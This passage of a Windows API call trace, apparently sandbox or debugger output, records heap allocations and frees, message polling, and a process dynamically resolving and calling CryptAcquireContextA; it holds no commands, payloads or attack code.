hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.410] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a792e0 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78ea8 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef5f8 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef160 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef508 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef430 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef220 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef1c0 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef310 | out: hHeap=0x2af0000) returned 1 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef160 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f98 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.411] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efc10 | out: hHeap=0x2af0000) returned 1 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78e80 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b98 [0084.411] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79038 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efc10 [0084.411] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef9e8 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78f98 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.412] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0084.412] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a78 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eee18 | out: hHeap=0x2af0000) returned 1 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eee18 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef220 [0084.412] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.412] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef310 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef1c0 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef508 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef5f8 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79128 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eeff8 | out: hHeap=0x2af0000) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eeff8 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b78 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b78 | out: hHeap=0x2af0000) returned 1 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef520 | out: hHeap=0x2af0000) returned 1 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef430 | out: hHeap=0x2af0000) returned 1 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef670 | out: hHeap=0x2af0000) returned 1 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef430 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef520 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef670 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0084.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef748 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ef7d8 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef748 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef7d8 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79128 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa30 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a88 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaa8 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a88 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ef9e8 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa48 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ac8 [0084.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaa8 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b78 [0084.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efbb0 [0084.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b78 | out: hHeap=0x2af0000) returned 1 [0084.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efaf0 [0084.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0084.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe08 [0084.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a28 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729c8 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ac8 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ac8 | out: hHeap=0x2af0000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729c8 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a98 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b48 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b68 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0084.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe98 [0084.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78f98 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ac8 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eff88 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a68 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efe20 [0084.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0084.529] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContext") returned 0x0 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78fe8 | out: hHeap=0x2af0000) returned 1 [0084.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0084.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0084.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7080, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0084.530] GetProcAddress (hModule=0x76390000, lpProcName="CryptAcquireContextA") returned 0x763afc40 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79060 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a738e8 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a68 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0084.530] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9961a8) returned 1 [0085.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0085.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0085.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f02b8 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.133] HeapFree 